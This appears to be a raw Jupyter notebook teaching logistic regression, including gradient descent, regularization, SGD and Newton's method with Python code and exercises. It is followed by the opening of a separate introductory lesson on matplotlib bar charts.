"# Parameters of the algorithms\nrho = float(1)/50 # Learning step\nn_it = 200 # Number of iterations\n\n# Compute Z's\nZ_tr = np.c_[np.ones(n_tr), Xn_tr] \nZ_tst = np.c_[np.ones(n_tst), Xn_tst]\nn_dim = Z_tr.shape[1]\n\n# Convert target arrays to column vectors\nY_tr2 = Y_tr[np.newaxis].T\nY_tst2 = Y_tst[np.newaxis].T\n\n# Running the gradient descent algorithm\nw, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)\n\n# Classify training and test data\np_tr, D_tr = logregPredict(Z_tr, w)\np_tst, D_tst = logregPredict(Z_tst, w)\n\n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\n# NLL plot.\nplt.plot(range(n_it), nll_tr,'b.:', label='Train')\nplt.xlabel('Iteration')\nplt.ylabel('Negative Log-Likelihood')\nplt.legend()\n\nprint('The optimal weights are:')\nprint(w)\nprint('The final error rates are:')\nprint('- Training:', pe_tr)\nprint('- Test:', pe_tst)\nprint('The NLL after training is', nll_tr[len(nll_tr)-1])",
"_____no_output_____"
]
],
[
[
"#### 3.2.3. Free parameters\n\nUnder certain conditions, the gradient descent method can be shown to converge asymptotically (i.e. as the number of iterations goes to infinity) to the ML estimate of the logistic model. However, in practice, the final estimate of the weights ${\\bf w}$ depend on several factors:\n\n- Number of iterations\n- Initialization\n- Learning step",
"_____no_output_____"
],
[
"**Exercise 4**: Visualize the variability of gradient descent caused by initializations. To do so, fix the number of iterations to 200 and the learning step, and execute the gradient descent 100 times, storing the training error rate of each execution. Plot the histogram of the error rate values.\n\nNote that you can do this exercise with a loop over the 100 executions, including the code in the previous code slide inside the loop, with some proper modifications. To plot a histogram of the values in array `p` with `n`bins, you can use `plt.hist(p, n)`",
"_____no_output_____"
],
[
"##### 3.2.3.1. Learning step\n\nThe learning step, $\\rho$, is a free parameter of the algorithm. Its choice is critical for the convergence of the algorithm. Too large values of $\\rho$ make the algorithm diverge. For too small values, the convergence gets very slow and more iterations are required for a good convergence.\n",
"_____no_output_____"
],
[
"**Exercise 5**: Observe the evolution of the negative log-likelihood with the number of iterations for different values of $\\rho$. It is easy to check that, for large enough $\\rho$, the gradient descent method does not converge. Can you estimate (through manual observation) an approximate value of $\\rho$ stating a boundary between convergence and divergence?",
"_____no_output_____"
],
[
"**Exercise 6**: In this exercise we explore the influence of the learning step more sistematically. Use the code in the previouse exercises to compute, for every value of $\\rho$, the average error rate over 100 executions. Plot the average error rate vs. $\\rho$. \n\nNote that you should explore the values of $\\rho$ in a logarithmic scale. For instance, you can take $\\rho = 1, \\frac{1}{10}, \\frac{1}{100}, \\frac{1}{1000}, \\ldots$",
"_____no_output_____"
],
[
"In practice, the selection of $\\rho$ may be a matter of trial an error. Also there is some theoretical evidence that the learning step should decrease along time up to cero, and the sequence $\\rho_n$ should satisfy two conditions:\n- C1: $\\sum_{n=0}^{\\infty} \\rho_n^2 < \\infty$ (decrease slowly)\n- C2: $\\sum_{n=0}^{\\infty} \\rho_n = \\infty$ (but not too slowly)\n\nFor instance, we can take $\\rho_n= \\frac{1}{n}$. Another common choice is $\\rho_n = \\frac{\\alpha}{1+\\beta n}$ where $\\alpha$ and $\\beta$ are also free parameters that can be selected by trial and error with some heuristic method.",
"_____no_output_____"
],
[
"#### 3.2.4. Visualizing the posterior map.\n\nWe can also visualize the posterior probability map estimated by the logistic regression model for the estimated weights.",
"_____no_output_____"
]
],
[
[
"# Create a regtangular grid.\nx_min, x_max = Xn_tr[:, 0].min(), Xn_tr[:, 0].max() \ny_min, y_max = Xn_tr[:, 1].min(), Xn_tr[:, 1].max()\ndx = x_max - x_min\ndy = y_max - y_min\nh = dy /400\nxx, yy = np.meshgrid(np.arange(x_min - 0.1 * dx, x_max + 0.1 * dx, h),\n np.arange(y_min - 0.1 * dx, y_max + 0.1 * dy, h))\nX_grid = np.array([xx.ravel(), yy.ravel()]).T\n\n# Compute Z's\nZ_grid = np.c_[np.ones(X_grid.shape[0]), X_grid] \n\n# Compute the classifier output for all samples in the grid.\npp, dd = logregPredict(Z_grid, w)\n\n# Paint output maps\npylab.rcParams['figure.figsize'] = 6, 6 # Set figure size\n\n# Put the result into a color plot\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.legend(loc='best')\nplt.axis('equal')\npp = pp.reshape(xx.shape)\nCS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)\nplt.contour(xx, yy, pp, levels=[0.5],\n colors='b', linewidths=(3,))\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\n\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"#### 3.2.5. Polynomial Logistic Regression\n\nThe error rates of the logistic regression model can be potentially reduced by using polynomial transformations.\n\nTo compute the polynomial transformation up to a given degree, we can use the `PolynomialFeatures` method in `sklearn.preprocessing`.",
"_____no_output_____"
]
],
[
[
"# Parameters of the algorithms\nrho = float(1)/50 # Learning step\nn_it = 500 # Number of iterations\ng = 5 # Degree of polynomial\n\n# Compute Z_tr\npoly = PolynomialFeatures(degree=g)\nZ_tr = poly.fit_transform(Xn_tr)\n# Normalize columns (this is useful to make algorithms more stable).)\nZn, mz, sz = normalize(Z_tr[:,1:])\nZ_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)\n\n# Compute Z_tst\nZ_tst = poly.fit_transform(Xn_tst)\nZn, mz, sz = normalize(Z_tst[:,1:], mz, sz)\nZ_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)\n\n# Convert target arrays to column vectors\nY_tr2 = Y_tr[np.newaxis].T\nY_tst2 = Y_tst[np.newaxis].T\n\n# Running the gradient descent algorithm\nw, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)\n\n# Classify training and test data\np_tr, D_tr = logregPredict(Z_tr, w)\np_tst, D_tst = logregPredict(Z_tst, w)\n \n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\n# NLL plot.\nplt.plot(range(n_it), nll_tr,'b.:', label='Train')\nplt.xlabel('Iteration')\nplt.ylabel('Negative Log-Likelihood')\nplt.legend()\n\nprint('The optimal weights are:')\nprint(w)\nprint('The final error rates are:')\nprint('- Training:', pe_tr)\nprint('- Test:', pe_tst)\nprint('The NLL after training is', nll_tr[len(nll_tr)-1])",
"_____no_output_____"
]
],
[
[
"Visualizing the posterior map we can se that the polynomial transformation produces nonlinear decision boundaries.",
"_____no_output_____"
]
],
[
[
"# Compute Z_grid\nZ_grid = poly.fit_transform(X_grid)\nn_grid = Z_grid.shape[0]\nZn, mz, sz = normalize(Z_grid[:,1:], mz, sz)\nZ_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)\n\n# Compute the classifier output for all samples in the grid.\npp, dd = logregPredict(Z_grid, w)\npp = pp.reshape(xx.shape)\n\n# Paint output maps\npylab.rcParams['figure.figsize'] = 6, 6 # Set figure size\n\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.axis('equal')\nplt.legend(loc='best')\nCS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)\nplt.contour(xx, yy, pp, levels=[0.5],\n colors='b', linewidths=(3,))\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"## 4. Regularization and MAP estimation.\n\nAn alternative to the ML estimation of the weights in logistic regression is Maximum A Posteriori estimation. Modelling the logistic regression weights as a random variable with prior distribution $p_{\\bf W}({\\bf w})$, the MAP estimate is defined as\n\n$$\n\\hat{\\bf w}_{\\text{MAP}} = \\arg\\max_{\\bf w} p({\\bf w}|{\\mathcal D})\n$$\n\nThe posterior density $p({\\bf w}|{\\mathcal D})$ is related to the likelihood function and the prior density of the weights, $p_{\\bf W}({\\bf w})$ through the Bayes rule\n\n$$\np({\\bf w}|{\\mathcal D}) = \n \\frac{P\\left({\\mathcal D}|{\\bf w}\\right) \\; p_{\\bf W}({\\bf w})}\n {p\\left({\\mathcal D}\\right)}\n$$\n\nIn general, the denominator in this expression cannot be computed analytically. However, it is not required for MAP estimation because it does not depend on ${\\bf w}$. Therefore, the MAP solution is given by\n\n\\begin{align}\n\\hat{\\bf w}_{\\text{MAP}} & = \\arg\\max_{\\bf w} \\left\\{ P\\left({\\mathcal D}|{\\bf w}\\right) \\; p_{\\bf W}({\\bf w}) \\right\\}\\\\\n& = \\arg\\max_{\\bf w} \\left\\{ L({\\mathbf w}) + \\log p_{\\bf W}({\\bf w})\\right\\} \\\\\n& = \\arg\\min_{\\bf w} \\left\\{ \\text{NLL}({\\mathbf w}) - \\log p_{\\bf W}({\\bf w})\\right\\}\n\\end{align}",
"_____no_output_____"
],
[
"\nIn the light of this expression, we can conclude that the MAP solution is affected by two terms:\n\n - The likelihood, which takes large values for parameter vectors $\\bf w$ that fit well the training data (smaller $\\text{NLL}$ values)\n - The prior distribution of weights $p_{\\bf W}({\\bf w})$, which expresses our *a priori* preference for some solutions. **Usually, we recur to prior distributions that take large values when $\\|{\\bf w}\\|$ is small (associated to smooth classification borders).**\n",
"_____no_output_____"
],
[
"We can check that the MAP criterion adds a penalty term to the ML objective, that penalizes parameter vectors for which the prior distribution of weights takes small values.\n\n### 4.1 MAP estimation with Gaussian prior\n\nIf we assume that ${\\bf W}$ follows a zero-mean Gaussian random variable with variance matrix $v{\\bf I}$, \n\n$$\np_{\\bf W}({\\bf w}) = \\frac{1}{(2\\pi v)^{N/2}} \\exp\\left(-\\frac{1}{2v}\\|{\\bf w}\\|^2\\right)\n$$\n\nthe MAP estimate becomes\n\n\\begin{align}\n\\hat{\\bf w}_{\\text{MAP}} \n &= \\arg\\min_{\\bf w} \\left\\{\\text{NLL}({\\bf w}) + \\frac{1}{C}\\|{\\bf w}\\|^2\n \\right\\}\n\\end{align}\n\nwhere $C = 2v$. Noting that\n\n$$\\nabla_{\\bf w}\\left\\{\\text{NLL}({\\bf w}) + \\frac{1}{C}\\|{\\bf w}\\|^2\\right\\} \n= - {\\bf Z} \\left({\\bf y}-\\hat{\\bf p}_n\\right) + \\frac{2}{C}{\\bf w},\n$$\n\nwe obtain the following gradient descent rule for MAP estimation\n\n\\begin{align}\n{\\bf w}_{n+1} &= \\left(1-\\frac{2\\rho_n}{C}\\right){\\bf w}_n \n + \\rho_n {\\bf Z} \\left({\\bf y}-\\hat{\\bf p}_n\\right)\n\\end{align}\n",
"_____no_output_____"
],
[
"### 4.2 MAP estimation with Laplacian prior\n\nIf we assume that ${\\bf W}$ follows a multivariate zero-mean Laplacian distribution given by\n\n$$\np_{\\bf W}({\\bf w}) = \\frac{1}{(2 C)^{N}} \\exp\\left(-\\frac{1}{C}\\|{\\bf w}\\|_1\\right)\n$$\n\n(where $\\|{\\bf w}\\|=|w_1|+\\ldots+|w_N|$ is the $L_1$ norm of ${\\bf w}$), the MAP estimate becomes\n\n\\begin{align}\n\\hat{\\bf w}_{\\text{MAP}} \n &= \\arg\\min_{\\bf w} \\left\\{\\text{NLL}({\\bf w}) + \\frac{1}{C}\\|{\\bf w}\\|_1\n \\right\\}\n\\end{align}\n\nThe additional term introduced by the prior in the optimization algorithm is usually named the *regularization term*. It is usually very effective to avoid overfitting when the dimension of the weight vectors is high. Parameter $C$ is named the *inverse regularization strength*.",
"_____no_output_____"
],
[
"**Exercise 7**: Derive the gradient descent rules for MAP estimation of the logistic regression weights with Laplacian prior.",
"_____no_output_____"
],
[
"## 5. Other optimization algorithms\n\n### 5.1. Stochastic Gradient descent.\n\nStochastic gradient descent (SGD) is based on the idea of using a single sample at each iteration of the learning algorithm. The SGD rule for ML logistic regression is\n\n\\begin{align}\n{\\bf w}_{n+1} &= {\\bf w}_n \n + \\rho_n {\\bf z}^{(n)} \\left(y^{(n)}-\\hat{p}^{(n)}_n\\right)\n\\end{align}\n\nOnce all samples in the training set have been applied, the algorith can continue by applying the training set several times.\n\nThe computational cost of each iteration of SGD is much smaller than that of gradient descent, though it usually needs many more iterations to converge.",
"_____no_output_____"
],
[
"**Exercise 8**: Modify logregFit to implement an algorithm that applies the SGD rule.",
"_____no_output_____"
],
[
"### 5.2. Newton's method\n\nAssume that the function to be minimized, $C({\\bf w})$, can be approximated by its second order Taylor series expansion around ${\\bf w}_0$\n\n$$ \nC({\\bf w}) \\approx C({\\bf w}_0) \n+ \\nabla_{\\bf w}^\\top C({\\bf w}_0)({\\bf w}-{\\bf w}_0)\n+ \\frac{1}{2}({\\bf w}-{\\bf w}_0)^\\top{\\bf H}({\\bf w}_0)({\\bf w}-{\\bf w}_0)\n$$\n\nwhere ${\\bf H}({\\bf w}_k)$ is the <a href=https://en.wikipedia.org/wiki/Hessian_matrix> *Hessian* matrix</a> of $C$ at ${\\bf w}_k$. Taking the gradient of $C({\\bf w})$, and setting the result to ${\\bf 0}$, the minimum of C around ${\\bf w}_0$ can be approximated as\n\n$$ \n{\\bf w}^* = {\\bf w}_0 - {\\bf H}({\\bf w}_0)^{-1} \\nabla_{\\bf w}^\\top C({\\bf w}_0)\n$$\n\nSince the second order polynomial is only an approximation to $C$, ${\\bf w}^*$ is only an approximation to the optimal weight vector, but we can expect ${\\bf w}^*$ to be closer to the minimizer of $C$ than ${\\bf w}_0$. Thus, we can repeat the process, computing a second order approximation around ${\\bf w}^*$ and a new approximation to the minimizer.\n\n<a href=https://en.wikipedia.org/wiki/Newton%27s_method_in_optimization> Newton's method</a> is based on this idea. At each optization step, the function to be minimized is approximated by a second order approximation using a Taylor series expansion around the current estimate. As a result, the learning rule becomes\n\n$$\\hat{\\bf w}_{n+1} = \\hat{\\bf w}_{n} - \\rho_n {\\bf H}({\\bf w}_k)^{-1} \\nabla_{{\\bf w}}C({\\bf w}_k)\n$$\n",
"_____no_output_____"
],
[
"\nFor instance, for the MAP estimate with Gaussian prior, the *Hessian* matrix becomes\n\n$$\n{\\bf H}({\\bf w}) \n = \\frac{2}{C}{\\bf I} + \\sum_{k=0}^{K-1} g({\\bf w}^\\top {\\bf z}^{(k)}) \\left[1-g({\\bf w}^\\top {\\bf z}^{(k)})\\right]{\\bf z}^{(k)} ({\\bf z}^{(k)})^\\top\n$$\n\nDefining diagonal matrix\n\n$$\n{\\mathbf S}({\\bf w}) = \\text{diag}\\left[g({\\bf w}^\\top {\\bf z}^{(k)}) \\left(1-g({\\bf w}^\\top {\\bf z}^{(k)})\\right)\\right]\n$$\n\nthe Hessian matrix can be written in more compact form as\n\n$$\n{\\bf H}({\\bf w}) \n = \\frac{2}{C}{\\bf I} + {\\bf Z}^\\top {\\bf S}({\\bf w}) {\\bf Z}\n$$\n\nTherefore, the Newton's algorithm for logistic regression becomes\n\n\\begin{align}\n{\\bf w}_{n+1} = {\\bf w}_{n} + \n\\rho_n \n\\left(\\frac{2}{C}{\\bf I} + {\\bf Z}^\\top {\\bf S}({\\bf w}_{n})\n{\\bf Z}\n\\right)^{-1} \n{\\bf Z}^\\top \\left({\\bf y}-\\hat{\\bf p}_n\\right)\n\\end{align}\n\nSome variants of the Newton method are implemented in the <a href=\"http://scikit-learn.org/stable/\"> Scikit-learn </a> package.\n\n",
"_____no_output_____"
]
],
[
[
"def logregFit2(Z_tr, Y_tr, rho, n_it, C=1e4):\n\n # Compute Z's\n r = 2.0/C\n n_dim = Z_tr.shape[1]\n\n # Initialize variables\n nll_tr = np.zeros(n_it)\n pe_tr = np.zeros(n_it)\n w = np.random.randn(n_dim,1)\n\n # Running the gradient descent algorithm\n for n in range(n_it):\n p_tr = logistic(np.dot(Z_tr, w))\n \n sk = np.multiply(p_tr, 1-p_tr)\n S = np.diag(np.ravel(sk.T))\n\n # Compute negative log-likelihood\n nll_tr[n] = - np.dot(Y_tr.T, np.log(p_tr)) - np.dot((1-Y_tr).T, np.log(1-p_tr))\n\n # Update weights\n invH = np.linalg.inv(r*np.identity(n_dim) + np.dot(Z_tr.T, np.dot(S, Z_tr)))\n\n w += rho*np.dot(invH, np.dot(Z_tr.T, Y_tr - p_tr))\n\n return w, nll_tr",
"_____no_output_____"
],
[
"# Parameters of the algorithms\nrho = float(1)/50 # Learning step\nn_it = 500 # Number of iterations\nC = 1000\ng = 4\n\n# Compute Z_tr\npoly = PolynomialFeatures(degree=g)\nZ_tr = poly.fit_transform(X_tr)\n# Normalize columns (this is useful to make algorithms more stable).)\nZn, mz, sz = normalize(Z_tr[:,1:])\nZ_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)\n\n# Compute Z_tst\nZ_tst = poly.fit_transform(X_tst)\nZn, mz, sz = normalize(Z_tst[:,1:], mz, sz)\nZ_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)\n\n# Convert target arrays to column vectors\nY_tr2 = Y_tr[np.newaxis].T\nY_tst2 = Y_tst[np.newaxis].T\n\n# Running the gradient descent algorithm\nw, nll_tr = logregFit2(Z_tr, Y_tr2, rho, n_it, C)\n\n# Classify training and test data\np_tr, D_tr = logregPredict(Z_tr, w)\np_tst, D_tst = logregPredict(Z_tst, w)\n \n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\n# NLL plot.\nplt.plot(range(n_it), nll_tr,'b.:', label='Train')\nplt.xlabel('Iteration')\nplt.ylabel('Negative Log-Likelihood')\nplt.legend()\n\nprint('The final error rates are:')\nprint('- Training:', str(pe_tr))\nprint('- Test:', str(pe_tst))\nprint('The NLL after training is:', str(nll_tr[len(nll_tr)-1]))",
"_____no_output_____"
]
],
[
[
"## 6. Logistic regression in Scikit Learn.\n\nThe <a href=\"http://scikit-learn.org/stable/\"> scikit-learn </a> package includes an efficient implementation of <a href=\"http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html#sklearn.linear_model.LogisticRegression\"> logistic regression</a>. To use it, we must first create a classifier object, specifying the parameters of the logistic regression algorithm.",
"_____no_output_____"
]
],
[
[
"# Create a logistic regression object.\nLogReg = linear_model.LogisticRegression(C=1.0)\n\n# Compute Z_tr\npoly = PolynomialFeatures(degree=g)\nZ_tr = poly.fit_transform(Xn_tr)\n# Normalize columns (this is useful to make algorithms more stable).)\nZn, mz, sz = normalize(Z_tr[:,1:])\nZ_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)\n\n# Compute Z_tst\nZ_tst = poly.fit_transform(Xn_tst)\nZn, mz, sz = normalize(Z_tst[:,1:], mz, sz)\nZ_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)\n\n# Fit model to data.\nLogReg.fit(Z_tr, Y_tr)\n\n# Classify training and test data\nD_tr = LogReg.predict(Z_tr)\nD_tst = LogReg.predict(Z_tst)\n \n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\nprint('The final error rates are:')\nprint('- Training:', str(pe_tr))\nprint('- Test:', str(pe_tst))\n\n# Compute Z_grid\nZ_grid = poly.fit_transform(X_grid)\nn_grid = Z_grid.shape[0]\nZn, mz, sz = normalize(Z_grid[:,1:], mz, sz)\nZ_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)\n\n# Compute the classifier output for all samples in the grid.\ndd = LogReg.predict(Z_grid)\npp = LogReg.predict_proba(Z_grid)[:,1]\npp = pp.reshape(xx.shape)\n\n# Paint output maps\npylab.rcParams['figure.figsize'] = 6, 6 # Set figure size\n\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.axis('equal')\n\nplt.contourf(xx, yy, pp, cmap=plt.cm.copper)\nplt.legend(loc='best')\n\nplt.contour(xx, yy, pp, levels=[0.5],\n colors='b', linewidths=(3,))\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2b5a03f610185aa2f91710326a748266471e42 | 254,812 | ipynb | Jupyter Notebook | engr1330jb/lessons/lesson15/.ipynb_checkpoints/lesson15-checkpoint.ipynb | dustykat/engr-1330-psuedo-course | 3e7e31a32a1896fcb1fd82b573daa5248e465a36 | [
"CC0-1.0"
] | null | null | null | engr1330jb/lessons/lesson15/.ipynb_checkpoints/lesson15-checkpoint.ipynb | dustykat/engr-1330-psuedo-course | 3e7e31a32a1896fcb1fd82b573daa5248e465a36 | [
"CC0-1.0"
] | null | null | null | engr1330jb/lessons/lesson15/.ipynb_checkpoints/lesson15-checkpoint.ipynb | dustykat/engr-1330-psuedo-course | 3e7e31a32a1896fcb1fd82b573daa5248e465a36 | [
"CC0-1.0"
] | null | null | null | 190.016406 | 23,080 | 0.891339 | [
[
[
"<div class=\"alert alert-block alert-info\">\n <b><h1>ENGR 1330 Computational Thinking with Data Science </h1></b> \n</div> \n\nCopyright © 2021 Theodore G. Cleveland and Farhang Forghanparast\n\nLast GitHub Commit Date: \n \n# 15: The `matplotlib` package\n- explore different types of plots\n- user defined functions for specific plotting",
"_____no_output_____"
],
[
"---\n\n## Objectives\n- Demonstrate common plot types and their uses\n- Define how to plot experimental data (observations) and theoretical data (model)\n 1. Marker conventions\n 2. Line conventions\n 3. Legends\n\n---\n\n### About `matplotlib`\nQuoting from: https://matplotlib.org/tutorials/introductory/pyplot.html#sphx-glr-tutorials-introductory-pyplot-py\n\n`matplotlib.pyplot` is a collection of functions that make matplotlib work like MATLAB. Each pyplot function makes some change to a figure: e.g., creates a figure, creates a plotting area in a figure, plots some lines in a plotting area, decorates the plot with labels, etc.\n\nIn `matplotlib.pyplot` various states are preserved across function calls, so that it keeps track of things like the current figure and plotting area, and the plotting functions are directed to the current axes (please note that \"axes\" here and in most places in the documentation refers to the axes part of a figure and not the strict mathematical term for more than one axis).\n\n**Computational thinking (CT)** concepts involved are:\n\n- `Decomposition` : Break a problem down into smaller pieces; separating plotting from other parts of analysis simplifies maintenace of scripts\n- `Abstraction` : Pulling out specific differences to make one solution work for multiple problems; wrappers around generic plot calls enhances reuse \n- `Algorithms` : A list of steps that you can follow to finish a task; Often the last step and most important to make professional graphics to justify the expense (of paying you to do engineering) to the client.",
"_____no_output_____"
],
[
"## Background\n\nData are not always numerical. \nData can music (audio files), or places on a map (georeferenced attributes files), images (various imge files, e.g. .png, jpeg)\n\nThey can also be categorical into which you can place individuals:\n- The individuals are cartons of ice-cream, and the category is the flavor in the carton\n- The individuals are professional basketball players, and the category is the player's team.\n\n---\n\n### Line Charts\nA line chart or line plot or line graph or curve chart is a type of chart which displays information as a series of data points called 'markers' connected by straight line segments.\n\nIt is a basic type of chart common in many fields. It is similar to a scatter plot (below) except that the measurement points are **ordered** (typically by their x-axis value) and joined with straight line segments. \n\nA line chart is often used to visualize a trend in data over intervals of time – a time series – thus the line is often drawn chronologically. \n\nThe x-axis spacing is sometimes tricky, hence line charts can unintentionally decieve - so be careful that it is the appropriate chart for your application. \n\nWe examined line charts in the prior lesson, so lets move on to other useful charts.\n\n---\n\n### Bar Graphs\n\nBar charts (graphs) are good display tools to graphically represent categorical information.\nThe bars are evenly spaced and of constant width. \nThe height/length of each bar is proportional to the `relative frequency` of the corresponding category.\n\n`Relative frequency` is the ratio of how many things in the category to how many things in the whole collection.\n\nThe example below uses `matplotlib` to create a box plot for the ice cream analogy, the example is adapted from an example at https://www.geeksforgeeks.org/bar-plot-in-matplotlib/",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \nimport matplotlib.pyplot # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nmyfigure = matplotlib.pyplot.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nmatplotlib.pyplot.bar(flavors, cartons, color ='teal', width = 0.4) \nmatplotlib.pyplot.xlabel(\"Flavors\") \nmatplotlib.pyplot.ylabel(\"No. of Cartons in Stock\") \nmatplotlib.pyplot.title(\"Current Ice Cream in Storage\") \nmatplotlib.pyplot.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nLets tidy up the script so it is more understandable, a small change in the import statement makes a simpler to read (for humans) script - also changed the bar colors just 'cause!",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \nimport matplotlib.pyplot as plt # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nmyfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nplt.bar(flavors, cartons, color ='lightblue', width = 0.4) \nplt.xlabel(\"Flavors\") \nplt.ylabel(\"No. of Cartons in Stock\") \nplt.title(\"Current Ice Cream in Storage\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nNow lets deconstruct the script a bit:\n\n ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \n import matplotlib.pyplot as plt # the python plotting library\n\n flavors = list(ice_cream.keys()) # make a list object based on flavors\n cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nThis part of the code creates a dictionary object, keys are the flavors, values are the carton counts (not the best way, but good for our learning needs). Next we import the python plotting library from `matplotlib` and name it **plt** to keep the script a bit easier to read.\n\n\n\nNext we use the list method to create two lists from the dictionary, **flavors** and **cartons**. Keep this in mind plotting is usually done on lists, so we need to prepare the structures properly.\n\nThe next statement\n\n myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n \nUses the figure class in **pyplot** from **matplotlib** to make a figure object named myfigure, the plot is built into this object. Every call to a method in `plt` adds content to `myfigure` until we send the instruction to render the plot (`plt.show()`)\n\nThe next portion of the script builds the plot:\n \n plt.bar(flavors, cartons, color ='orange', width = 0.4) # Build a bar chart, plot series flavor on x-axis, plot series carton on y-axis. Make the bars orange, set bar width (units unspecified)\n plt.xlabel(\"Flavors\") # Label the x-axis as Flavors\n plt.ylabel(\"No. of Cartons in Stock\") # Label the x-axis as Flavors\n plt.title(\"Current Ice Cream in Storage\") # Title for the whole plot\n \nThis last statement renders the plot to the graphics device (probably localhost in the web browser)\n\n plt.show() \n \n---\n\nNow lets add another set of categories to the plot and see what happens",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \neaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model \nimport matplotlib.pyplot as plt # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nanimals = list(eaters.keys()) \nbeasts = list(eaters.values()) \nmyfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nplt.bar(flavors, cartons, color ='orange', width = 0.4) \nplt.bar(animals, beasts, color ='green', width = 0.4) \nplt.xlabel(\"Flavors\") \nplt.ylabel(\"Counts: Cartons and Beasts\") \nplt.title(\"Current Ice Cream in Storage\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nNow suppose we want horizontal bars we can search pyplot for such a thing. If one types horizontal bar chart into the pyplot search engine there is a link that leads to:\n\n\n\nWhich has the right look! If we examine the script there is a method called `barh` so lets try that.\n\n```{note} \nUse the search engines to find out things you need to accomplish a task.\n```",
"_____no_output_____"
]
],
[
[
